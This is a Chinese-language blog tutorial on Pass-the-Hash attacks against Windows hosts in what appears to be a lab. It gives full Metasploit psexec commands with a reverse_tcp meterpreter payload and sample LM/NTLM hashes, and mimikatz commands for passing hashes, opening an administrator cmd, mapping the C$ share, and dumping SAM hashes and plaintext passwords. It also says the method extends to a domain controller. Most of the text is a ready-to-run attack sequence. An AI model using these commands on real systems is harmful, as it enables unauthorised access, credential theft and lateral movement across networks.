哈希传递攻击(Pass-the-Hash)

使用msf进行哈希传递攻击

有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享)打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(注意:只能是administrator用户的LM-hash和NTLM-hash,我试过几次其他用户的,发现不能成功)

msf > use  exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost 192.168.222.130
msf exploit(psexec) > set rhost 192.168.222.131
msf exploit(psexec) > set smbuser Administrator
msf exploit(psexec) > set smbpass 6d181cfaad0258eaaad3b435b51404ee: 9d482ae1705fd48c581e20a4123fb0dc   # 冒号前面为LM后面为NTLM
msf exploit(psexec) > exploit

在这里插入图片描述
成功拿到meterpreter
在这里插入图片描述

使用mimikatz进行哈希传递攻击PTH(工作组)

当我们获得了内网中一台主机的NTLM哈希值,我们可以利用mimikatz对这个主机进行哈希传递攻击,执行命令成功后将会反弹回cmd窗口

#使用administrator用户的NTLM哈希值进行攻击
sekurlsa::pth /user:administrator /domain:192.168.222.131 /ntlm:9d482ae1705fd48c581e20a4123fb0dc

执行命令,成功返回cmd
在这里插入图片描述
在弹出的cmd中,我们还可以直接连接该主机,还可以查看目录文件等操作

连接命令:net use \\192.168.222.131\c$

在这里插入图片描述
当然用其他用户的NTLM哈希值也是可以的,不过反弹回来的cmd权限就低了。

#使用man用户的NTLM哈希值进行攻击
sekurlsa::pth /user:man /domain:192.168.222.131 /ntlm:3dbde697d71690a769204beb12283678

在这里插入图片描述
另外:
在域环境中,如果我们拥有域内任意一台主机的本地administrator权限和管理员的NTLM哈希值,那么我们就可以利用域内某台主机使用mimikatz对域控进行哈希传递攻击。操作方法与上类似,只是连接的时候换成域控的地址。

meterpreter加载mimkatz模块获取用户密码

首先我们要先获取一个meterpreter权限过程省略了,然后加载mimikatz
命令:load mimikatz
在这里插入图片描述
用msv可以查看到用户密码的hash值
在这里插入图片描述
用kerberos可以获取用户的明文密码(或者wdigest和tspkg)
在这里插入图片描述
如果以上命令不行的话,我们可以执行mimikatz的命令来获取。

mimikatz_command -f samdump::hashes (意思是从windows的sam文件中读取密码hash值,windows密码存储在sam文件内)

在这里插入图片描述
获取明文的密码

mimikatz_command -f sekurlsa::searchPasswords

在这里插入图片描述

  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值